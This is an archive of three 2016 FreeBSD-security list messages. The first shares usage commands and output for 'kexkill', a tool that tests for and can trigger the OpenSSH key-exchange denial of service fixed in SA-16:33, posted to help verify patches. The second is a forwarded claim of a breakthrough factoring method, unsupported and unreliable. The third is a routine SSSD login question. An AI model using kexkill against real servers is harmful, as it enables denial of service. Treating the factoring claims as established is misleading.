From owner-freebsd-security@freebsd.org Sun Nov 6 14:59:46 2016 Return-Path: Delivered-To: freebsd-security@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 8CD0AC3390B for ; Sun, 6 Nov 2016 14:59:46 +0000 (UTC) (envelope-from des@des.no) Received: from smtp.des.no (smtp.des.no [194.63.250.102]) by mx1.freebsd.org (Postfix) with ESMTP id 50CA5AC8 for ; Sun, 6 Nov 2016 14:59:45 +0000 (UTC) (envelope-from des@des.no) Received: from desk.des.no (smtp.des.no [194.63.250.102]) by smtp.des.no (Postfix) with ESMTP id 51925A8BC; Sun, 6 Nov 2016 14:59:39 +0000 (UTC) Received: by desk.des.no (Postfix, from userid 1001) id C741143EF0; Sun, 6 Nov 2016 15:59:38 +0100 (CET) From: =?utf-8?Q?Dag-Erling_Sm=C3=B8rgrav?= To: Xin LI Cc: Vladimir Terziev , "\" , Gregory Orange Subject: Re: FreeBSD Security Advisory FreeBSD-SA-16:33.openssh References: <20161102075533.8BBA114B5@freefall.freebsd.org> <201611021357.uA2DvHMW003088@higson.cam.lispworks.com> <24ff198d-9bd2-9842-50d8-8a1d5e2ecf8a@FreeBSD.org> <79b7122f-3b1a-377f-42bf-bd2851c5e6ae@calorieking.com> <97DEB29F-E625-4A74-9E1A-BC2A220DCF5A@bwinparty.com> Date: Sun, 06 Nov 2016 15:59:38 +0100 In-Reply-To: (Xin LI's message of "Fri, 4 Nov 2016 10:08:05 -0700") Message-ID: <86vaw0irhh.fsf@desk.des.no> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/25.1 (berkeley-unix) MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.23 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 06 Nov 2016 14:59:46 -0000 Xin LI writes: > We will investigate if the statement is true and will issue patches > for earlier FreeBSD releases, if they are confirmed to be affected. Hoping to make your life a little easier: $ git clone https://github.com/dag-erling/kexkill $ cd kexkill $ ./autogen.sh && ./configure && make vulnerable 12.0 system: $ ./src/kexkill -v -n1 target |& grep -v "sending kexinit" kexkill: [03] connected kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310 kexkill: [03] sending banner kexkill: [03] received kexinit [no more output] ^C same system after applying SA-16:33: $ ./src/kexkill -v -n1 target |& grep -v "sending kexinit" kexkill: [03] connected kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310 kexkill: [03] sending banner kexkill: [03] received kexinit kexkill: [03] read(): Connection reset by peer kexkill: [03] connected kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310 kexkill: [03] sending banner kexkill: [03] received kexinit kexkill: [03] write(): Broken pipe kexkill: [03] connected kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310 kexkill: [03] sending banner kexkill: [03] received kexinit kexkill: [03] read(): Connection reset by peer [...] ^C Remove -n1 to actually (attempt to) attack the system rather than just probe it. DES --=20 Dag-Erling Sm=C3=B8rgrav - des@des.no From owner-freebsd-security@freebsd.org Mon Nov 7 14:54:58 2016 Return-Path: Delivered-To: freebsd-security@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 71E26C34A50 for ; Mon, 7 Nov 2016 14:54:58 +0000 (UTC) (envelope-from repeatable_compression@yahoo.com) Received: from nm37.bullet.mail.ne1.yahoo.com (nm37.bullet.mail.ne1.yahoo.com [98.138.229.30]) (using TLSv1 with cipher ECDHE-RSA-RC4-SHA (128/128 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 40387C26 for ; Mon, 7 Nov 2016 14:54:57 +0000 (UTC) (envelope-from repeatable_compression@yahoo.com) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s2048; t=1478530491; bh=cYHXaQpgd1BYjVT+R88n0tEupjRjgz7s8gEL1DfjHJg=; h=Date:From:Reply-To:To:In-Reply-To:References:Subject:From:Subject; b=iN4NztqD5sH+fyE165V4gZFYi0ZYmUxy+EfktY83tBN4BshAbyo1j6Php/XpGArThoG/HndWeQtLTBuVlCS3Ts26i0VpUHqm+VH+LtT+OAcwazaB8OS1MJjs+7r9n6bF6LxwXNJPNb4P1qD9y2E2TT04Iay3xW9mOtfO4svAQFaeazOIM/qdvf7T6CTkK63EFmt+pWCWbrhs+ut7ZXatsOoLDfkhYl/qzci0GFOQx9tUweP8RHPN/NkIMfpdpG9VeiSdHW81WpUCHz+uhOhEqU+mhjiRcU7QJSB6CyTrFeYF6AsbhxC+eh89zmBLmsZmsdqjIWwDZle7wJtzVDM+sQ== Received: from [127.0.0.1] by nm37.bullet.mail.ne1.yahoo.com with NNFMP; 07 Nov 2016 14:54:51 -0000 Received: from [98.138.226.180] by nm37.bullet.mail.ne1.yahoo.com with NNFMP; 07 Nov 2016 14:51:51 -0000 Received: from [98.138.88.238] by tm15.bullet.mail.ne1.yahoo.com with NNFMP; 07 Nov 2016 14:51:51 -0000 Received: from [127.0.0.1] by omp1038.mail.ne1.yahoo.com with NNFMP; 07 Nov 2016 14:51:51 -0000 X-Yahoo-Newman-Property: ymail-4 X-Yahoo-Newman-Id: 352122.35785.bm@omp1038.mail.ne1.yahoo.com X-YMail-OSG: hs3uD50VM1kunO8f97cUVU.yfVSTM6r0QYTlKJaiwN8xu1eaqPlhQQdcXeyqX.z lSL.zc_eJZsbpHHHxDLcLy7NRUiP9qa_tGfBbM4TcHpcsAom80w0g92dQaMLA17rPK4rB.IRzOGe oXocZe0XxuCSG.PDfGoCVSc49hUdQ11TmylShk0b8KMZFmfc_D2OUNbae2Whw6DzB3sQaRoiN4.D B3Ex3BTKhMp7Tr15SEDFvl0GNa9YqZ_ab8fwC_YKkpz6kH.pxOEWQPh.o6MmMUYvKehFbWkh0P6L hwTq6kqnT4t9pys0GxyAKAeSeVqs.5KSwhIixJV2D0mgOesQRUaEvf130W2PloD74K94Qgw52w13 9Rq8L7MlcCx6RJS.5C5rGEoAB2tU8hdLjZxo5bxmnnLyoAbpA_Z4P.UUDNc3dQ8vP58Fv50vFEph blAj5OmRurdn29jGyP7DlyVsN0lxHusnmWZDhUU9qbrRVYnXAP.akyg3ThuDX8z7nAKjG_dL6s_r CsxKMci_ogyeltGjFOZ3IPJiFOpLI0s.aU2Lk5B7yyoho.gddTIVfhXYydtzFtqedMNbp3KgT5Kw 0rfqbowZM4V640g-- Received: from jws200156.mail.ne1.yahoo.com by sendmailws162.mail.ne1.yahoo.com; Mon, 07 Nov 2016 14:51:50 +0000; 1478530310.986 Date: Mon, 7 Nov 2016 14:51:50 +0000 (UTC) From: Jules Gilbert Reply-To: Jules Gilbert To: Freebsd-security Message-ID: <370156200.1605250.1478530310615@mail.yahoo.com> In-Reply-To: <626246438.1619078.1478529787981@mail.yahoo.com> References: <626246438.1619078.1478529787981.ref@mail.yahoo.com> <626246438.1619078.1478529787981@mail.yahoo.com> Subject: Fw: a factoring program I've decided to give away MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.23 X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.23 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 07 Nov 2016 14:54:58 -0000 =20 ----- Forwarded Message ----- From: Jules Gilbert To: Paul Sent: Monday, November 7, 2016 9:43 AM Subject: a factoring program I've decided to give away =20 Hello Paul. I should mention, consistent with my purpose in writing (to effect simultan= eous distribution of a program I wrote,) several friends of mine are BCC'ed= . I would like to give away, using your website forum as a base, a program I = wrote maybe five years ago.=C2=A0 The program is a fast-factoring engine.= =C2=A0 See the attachment, I'm giving you a copy. =C2=A0 I seek to give it = to thousands of cryptologic programmers and analyst's as simultaneously as = possible, it's written in C, does not make use of methods based on primes, = but instead employs what I believe is a completely different method to fact= or numbers, presumably the product of two large primes. My purpose is to encourage further research in this area and also to cause = the people who make the big decisions to consider moving away from privacy = tools based on factoring and public/private keys.=C2=A0 Why?, this simple p= rogram localizes the smaller of the two primes used to setup an instance of= encryption.=C2=A0 And look how simple it is!, it's really just the junior = program, the 'senior' program does much better.=C2=A0 (As you will see it's= based on functions like the 'ratio' tool included here.) About the size of the numbers, today I use a tool that converts bignum refe= rences to 'BSD bignum code, but when I wrote this I used MAPM. Probably the most important thing I can say to describe it, is that it isn'= t the kind of tool one might use to, say, break down the security of a bank= 's files.=C2=A0 Yes it can factor any pair of large integers, but it's not = written to be the tool of a criminal, rather a tool to aid number research,= particularly with regard to factoring related research.=C2=A0=20 Given: c =3D a*b, where a,b,c, are large positive integers. And, given only 'c', it finds 'a'.=C2=A0 By convention (my convention,) 'a'= is the smaller factor. The program proves the method by building a thousand example pairs of (a,b)= and then, using only the 'c' value, locates 'a'.=C2=A0 It takes, depending= the speed of one's computer, from a few hours to maybe just half an hour t= o do all thousand problems. The thousand pairs of large numbers are assembl= ed using random numbers.=C2=A0 Looking at the code you'll see all this, it'= s pretty obvious. But read this next section! If we use c =3D a*b, then 'a' must be within the range of 3 .. sqrt(c), it = can not be outside this range -- not if we're talking about positive intege= rs. My program divides this range into 1,024 sub-sections and identifies which = 32 sections the 'a' value is closest too.=C2=A0=C2=A0 Assuming we're using = the values 'lo' and 'hi' which represent the total range, then knowing the = approximate location of 'a', the program be used to respecify 'lo' and 'hi'= , reflecting this smaller space and re-applied to further localize the exac= t value of 'a'.=20 Though I'd like to say my program is doing a true binary decomposition -- s= omething that many researchers have been attempting, no -- my program isn't= quite that.=20 When the number of sub-sections is 1,024 and the program resolves 'a' to on= e of 32 sub-sections, that's a five bit gain.=C2=A0 True, five bits isn't m= uch when compared to the thousands of bits that is typical for 'c'.=C2=A0 W= hich is why re-application is so important. Originally I wrote code to do backup when necessary;=C2=A0 When the program= makes a wrong choice the process quickly fails, and the program backs up s= everal steps (originally the default back-step value was set to five,) and = then retry making the alternative choice five steps back.=C2=A0 Because I'm= trying to avoid empowering criminals and similar types, I've cut that logi= c out from what I'm giving away.=C2=A0=20 And second, also deter bad guys, I include only one "left-right deciding" m= ethod.=C2=A0 These are the lowest level routines that are the basis of prog= ram operation.=C2=A0=C2=A0 Originally I used GAC, one of Spear's genetic to= ols (which btw, are pretty cool, and very easy to use!, too.)=C2=A0=C2=A0 T= he method provided works but isn't the best one.=C2=A0 (eg., I don't think = a "best" one exists, this is a probabilistic problem.)=C2=A0 What's really = best is to use several and vote the answers, to go left or right.=C2=A0 The= 'ratio' model I supply is simple and sufficient for others to learn from. The program core makes use of a very simple left-right decider, which takes= advantage of the differing limits of two sums, each sum derived by summing= the results of modulus taking arithmetic.=C2=A0 I don't know if this prope= rty is known to others, (as I discuss above,) I discovered it using mechani= cal search techniques.=C2=A0=20 So why am I publishing this at all, and why now?=C2=A0 First, my work relat= ing to prediction has taken a turn that I want to pursue.=C2=A0 (And ah, my= health isn't so good -- I do what I'm supposed to, but I'm still declining= .) But second, the more I learn about number theory and some related topics, t= he more I fear the NSA made a mistake forty years ago by focusing most Amer= ican cryptography on factoring and public-key methods.=C2=A0 Why was this s= uch an awful mistake?, because science always moves forward, and what was i= mpossibly hard forty years ago is today is today millions of times easier.= =C2=A0 (eg., more feasible.) The NSA website encourages researchers to publish, to bring forward their i= deas, to tell others.=C2=A0 I contacted them privately two years ago, and t= hen again, perhaps a year ago, at the time American police stations were ge= tting hit by the Russian mob and I wanted to help the NSA to stop this.=C2= =A0 Each time I offered my consulting service, each time no one thought eno= ugh of my offer to reply.=C2=A0 Okay -- though when I had my career and app= lied for work I always, without fail, always, either got the work or at lea= st a nice letter in reply.=C2=A0 Apparently the NSA has different standards= ...=C2=A0 (From what the news reports are saying they prefer people such as= Snowden and now, Martin.) Anyway, I have something else I'm working on but since my health isn't so g= ood and since I fear we (our nation,) is headed into worse problems, maybe = I can at least improve our cryptologic health by encouraging America's IT m= anager's to move away from methods that more and more seem to be weak and s= uspect.=C2=A0 Yes I mean methods based on factoring. For me to post the program you will need to give me my account name and pas= sword, I've forgotten them.=C2=A0 Sorry. The program is attached. =20 From owner-freebsd-security@freebsd.org Sat Nov 12 17:43:19 2016 Return-Path: Delivered-To: freebsd-security@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 91213C3DEBF for ; Sat, 12 Nov 2016 17:43:19 +0000 (UTC) (envelope-from ronnyforberger@ronnyforberger.de) Received: from wp112.webpack.hosteurope.de (wp112.webpack.hosteurope.de [80.237.132.119]) (using TLSv1 with cipher ECDHE-RSA-AES128-SHA (128/128 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 5938C1C5F for ; Sat, 12 Nov 2016 17:43:18 +0000 (UTC) (envelope-from ronnyforberger@ronnyforberger.de) Received: from app04.ox.hosteurope.de ([92.51.170.11]); authenticated by wp112.webpack.hosteurope.de running ExIM with esmtpsa (TLS1.0:RSA_AES_128_CBC_SHA1:128) id 1c5blx-0007Vq-Nc; Sat, 12 Nov 2016 18:07:21 +0100 Date: Sat, 12 Nov 2016 18:07:21 +0100 (CET) From: Ronny Forberger Reply-To: Ronny Forberger To: freebsd-security@freebsd.org Message-ID: <585949692.395252.1478970441730.JavaMail.open-xchange@app04.ox.hosteurope.de> Subject: I have no name prompt and no passwords recognized MIME-Version: 1.0 X-Priority: 3 Importance: Medium X-Mailer: Open-Xchange Mailer v7.6.2-Rev61 X-Originating-Client: com.openexchange.ox.gui.dhtml X-bounce-key: webpack.hosteurope.de; ronnyforberger@ronnyforberger.de; 1478972599; 1a6a7f6b; Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Content-Filtered-By: Mailman/MimeDel 2.1.23 X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.23 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 12 Nov 2016 17:43:19 -0000 Hi, I am using SSSD and FreeBSD to authenticate against samba4. I used this howto setting all up: http://serverfault.com/questions/599200/how-to-integrate-active-directory-with-freebsd-10-0-using-security-sssd But when I want to logon using password, i.e. via dovecot I get wrong password. Neigher can I use sudo typing the correct samba4 password. Also I get a prompt [I have no name!@HOSTNAME] and my files, which I chowned & chgrped to the samba user and group only show IDs as owner. Any ideas how to solve this? Can this maybe be a permission problem with some file for sssd / NSS which an unprivileged user cannot read? Best regards, Ronny Forberger ___________________________________ Ronny Forberger ronnyforberger at ronnyforberger.de PGP: http://www.ronnyforberger.de/pgp/email-encryption.html